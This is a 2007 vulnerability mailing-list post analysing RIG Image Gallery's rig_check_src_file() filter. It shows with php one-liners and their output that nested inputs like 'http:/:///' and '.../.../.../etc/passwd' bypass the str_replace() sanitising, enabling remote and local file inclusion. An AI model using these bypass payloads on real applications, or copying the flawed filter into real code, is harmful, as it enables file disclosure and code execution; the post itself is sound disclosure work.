[VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability

ascii ascii at katamail.com
Tue Jul 31 15:09:41 UTC 2007


George A. Theall wrote:
> But regardless, the str_replace() later on in rig_check_src_file()
> would certainly void the possibility of a remote file include attack.

I'm not saying that the product is vulnerable but that this statement
is completely flawed, rig_check_src_file() is mostly useless (assumption
taken from the George's code snippet, I haven't downloaded the original
script).

function rig_check_src_file($name) {
  ...
          $name = str_replace("..", ".", str_replace("://", "", $name));
  ...
          return $name;
}

This alone permits both local and remote file inclusions:

Example a) Remote file inclusion

php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".",
str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
http://www.tin.it/

Warning: require_once(): URL file-access is disabled in the server
configuration in Command line code on line 1

Warning: require_once(http://www.tin.it/): failed to open stream: no
suitable wrapper could be found in Command line code on line 1

Fatal error: require_once(): Failed opening required
'http://www.tin.it/' (include_path='.:/usr/share/php5:/usr/share/php')
in Command line code on line 1

Example b) Local file inclusion

php -r '$name=".../.../.../etc/passwd"; $name = str_replace("..", ".",
str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
../../../etc/passwd

Warning: require_once(../../../etc/passwd): failed to open stream: No
such file or directory in Command line code on line 1

Fatal error: require_once(): Failed opening required
'../../../etc/passwd' (include_path='.:/usr/share/php5:/usr/share/php')
in Command line code on line 1

Best regards,
Francesco `ascii` Ongaro
http://www.ush.it/





More information about the VIM mailing list